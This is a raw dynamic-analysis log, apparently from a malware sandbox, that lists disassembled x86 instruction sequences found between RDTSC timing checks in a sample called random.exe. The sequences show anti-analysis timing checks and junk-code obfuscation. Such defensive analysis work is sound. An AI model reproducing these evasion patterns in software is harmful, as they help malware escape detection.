Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FEF32F second address: FEF339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FDD08CD5746h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF20F4 second address: FF20F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF20F8 second address: FF214F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5755h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FDD08CD5748h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D1ACAh], edi 0x0000002a push 00000000h 0x0000002c jnc 00007FDD08CD574Bh 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 pushad 0x00000036 pushad 0x00000037 jc 00007FDD08CD5746h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF22C6 second address: FF22CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF0413 second address: FF0428 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDD08CD574Ch 0x00000008 jnl 00007FDD08CD5746h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF427A second address: FF4288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007FDD093B1DE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF5050 second address: FF505E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDD08CD5746h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF22CA second address: FF2392 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007FDD093B1DF1h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 jne 00007FDD093B1DE8h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov dword ptr [ebp+122D2CEAh], eax 0x0000002b jns 00007FDD093B1DECh 0x00000031 mov eax, dword ptr [ebp+122D1171h] 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FDD093B1DE8h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 mov bh, ch 0x00000053 jno 00007FDD093B1DF4h 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push edi 0x0000005e call 00007FDD093B1DE8h 0x00000063 pop edi 0x00000064 mov dword ptr [esp+04h], edi 0x00000068 add dword ptr [esp+04h], 0000001Ah 0x00000070 inc edi 0x00000071 push edi 0x00000072 ret 0x00000073 pop edi 0x00000074 ret 0x00000075 nop 0x00000076 jmp 00007FDD093B1DF0h 0x0000007b push eax 0x0000007c push esi 0x0000007d push eax 0x0000007e push edx 0x0000007f pushad 0x00000080 popad 0x00000081 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF505E second address: FF50D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD08CD574Ah 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FDD08CD5748h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 stc 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FDD08CD5748h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 mov edi, 4180C852h 0x0000004a push 00000000h 0x0000004c movzx edi, di 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FDD08CD5754h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF50D1 second address: FF50D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF50D5 second address: FF50DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF5FFC second address: FF6007 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FDD093B1DE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF51E0 second address: FF51FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDD08CD574Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF51FA second address: FF5204 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDD093B1DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF5204 second address: FF520A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF520A second address: FF520E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF520E second address: FF5289 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push edi 0x0000000a jmp 00007FDD08CD574Fh 0x0000000f pop edi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov dword ptr [ebp+122D1841h], ecx 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007FDD08CD5748h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 0000001Ah 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e mov bx, ECF6h 0x00000042 mov eax, dword ptr [ebp+122D0329h] 0x00000048 mov di, cx 0x0000004b push FFFFFFFFh 0x0000004d cmc 0x0000004e nop 0x0000004f push eax 0x00000050 push edx 0x00000051 jnp 00007FDD08CD5758h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF9C30 second address: FF9C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD093B1DF4h 0x00000009 popad 0x0000000a jmp 00007FDD093B1DF5h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDD093B1DEBh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF9C6B second address: FF9C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFD52E second address: FFD541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FDD093B1DE6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFFF17 second address: FFFF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFFF1B second address: FFFF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1000061 second address: 100007D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD08CD5756h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100007D second address: 1000081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1000081 second address: 1000085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1000085 second address: 1000092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1000092 second address: 1000096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10001BC second address: 10001DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a jmp 00007FDD093B1DF5h 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100032B second address: 1000337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDD08CD5746h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1005122 second address: 1005167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD093B1DECh 0x00000009 popad 0x0000000a push edi 0x0000000b jmp 00007FDD093B1DF5h 0x00000010 pop edi 0x00000011 jmp 00007FDD093B1DF7h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1005167 second address: 100516C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100516C second address: 1005178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FDD093B1DE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1006F5D second address: 1006F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1006F63 second address: 1006F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1006F67 second address: 1006F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FDD08CD574Bh 0x00000012 popad 0x00000013 pop edx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007FDD08CD574Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1006F8F second address: 1006F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1006F93 second address: 1006F98 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1006F98 second address: 1006FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jc 00007FDD093B1DE6h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1006FAB second address: 1006FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10070A2 second address: 10070CE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FDD093B1DEBh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FDD093B1DF2h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10070CE second address: 10070E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jnp 00007FDD08CD5746h 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10070E3 second address: 1007100 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDD093B1DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jmp 00007FDD093B1DEAh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9F47C second address: F9F480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9F480 second address: F9F494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9A46D second address: F9A471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100C7A9 second address: 100C7B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FDD093B1DE6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100C7B7 second address: 100C7BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100CD67 second address: 100CD6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100CD6D second address: 100CD73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100CD73 second address: 100CD89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DEAh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jg 00007FDD093B1DE6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100CD89 second address: 100CD93 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDD08CD5746h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 100D6A8 second address: 100D6B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10129FC second address: 1012A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1012A02 second address: 1012A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1012CD6 second address: 1012CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1012CDA second address: 1012CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1012CE2 second address: 1012CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1012CE8 second address: 1012CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1012CEE second address: 1012D0D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDD08CD5746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDD08CD574Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1012D0D second address: 1012D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1012D11 second address: 1012D40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5750h 0x00000007 jmp 00007FDD08CD574Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FDD08CD574Ch 0x00000014 jnp 00007FDD08CD5746h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1012D40 second address: 1012D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD093B1DF6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1012D5C second address: 1012D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10131B1 second address: 10131B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F939A4 second address: F939A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F939A9 second address: F939BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDD093B1DE6h 0x0000000a pushad 0x0000000b popad 0x0000000c jbe 00007FDD093B1DE6h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1013956 second address: 1013977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDD08CD5748h 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FDD08CD5746h 0x00000014 jmp 00007FDD08CD574Bh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1013977 second address: 101399D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DF9h 0x00000007 jns 00007FDD093B1DE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1012186 second address: 101218A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101218A second address: 1012194 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDD093B1DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1012194 second address: 101219A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101EEC0 second address: 101EEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101EEC4 second address: 101EEC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101F173 second address: 101F180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FDD093B1DE6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101F180 second address: 101F184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101F184 second address: 101F19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jc 00007FDD093B1DE6h 0x0000000e jnc 00007FDD093B1DE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1023D27 second address: 1023D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1023D2B second address: 1023D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FDD093B1DE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FDD093B1DEAh 0x00000012 pop edi 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1023D46 second address: 1023D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD9DA9 second address: FD9DB3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDD093B1DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD9DB3 second address: FBFEB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD574Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, dword ptr [ebp+122D34E8h] 0x00000010 lea eax, dword ptr [ebp+1247CB14h] 0x00000016 mov ecx, dword ptr [ebp+122D358Ch] 0x0000001c push eax 0x0000001d push ebx 0x0000001e push eax 0x0000001f jmp 00007FDD08CD574Fh 0x00000024 pop eax 0x00000025 pop ebx 0x00000026 mov dword ptr [esp], eax 0x00000029 or edx, 56C9A220h 0x0000002f call dword ptr [ebp+122D32F6h] 0x00000035 jmp 00007FDD08CD5755h 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d push eax 0x0000003e pop eax 0x0000003f jnl 00007FDD08CD5746h 0x00000045 push edi 0x00000046 pop edi 0x00000047 jmp 00007FDD08CD5756h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD9EAC second address: FD9EB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD9F9A second address: FD9FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FDD08CD5746h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDA461 second address: FDA504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 7CFC7612h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FDD093B1DE8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov cx, 421Eh 0x0000002e call 00007FDD093B1DE9h 0x00000033 pushad 0x00000034 jc 00007FDD093B1DFDh 0x0000003a jmp 00007FDD093B1DF7h 0x0000003f jmp 00007FDD093B1DECh 0x00000044 popad 0x00000045 push eax 0x00000046 pushad 0x00000047 jnc 00007FDD093B1DECh 0x0000004d push esi 0x0000004e jmp 00007FDD093B1DEEh 0x00000053 pop esi 0x00000054 popad 0x00000055 mov eax, dword ptr [esp+04h] 0x00000059 push eax 0x0000005a push edx 0x0000005b push edx 0x0000005c js 00007FDD093B1DE6h 0x00000062 pop edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDA504 second address: FDA50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDA50A second address: FDA50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
